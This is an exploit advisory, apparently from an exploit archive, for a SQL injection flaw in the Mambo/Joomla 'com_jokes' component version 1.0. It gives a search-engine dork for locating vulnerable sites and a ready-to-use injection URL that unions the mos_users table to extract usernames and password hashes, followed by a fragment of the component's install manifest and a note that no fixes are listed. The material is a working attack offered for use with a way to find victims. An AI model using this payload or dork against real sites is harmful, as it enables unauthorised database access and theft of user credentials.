Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability

2008-01-30 00:00:00

#########################################################################
#
# joomla SQL Injection(com_jokes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_jokes"
#
########################################################################
EXPLOIT :

index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*

#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################


<mosinstall type="component">
<name>jokes</name>
<creationDate>29/12/2005</creationDate>
<author>Atapin</author>
<copyright>Released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>

<authorUrl>www.atapin.net</authorUrl>
<version>1.0</version>
<description></description>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.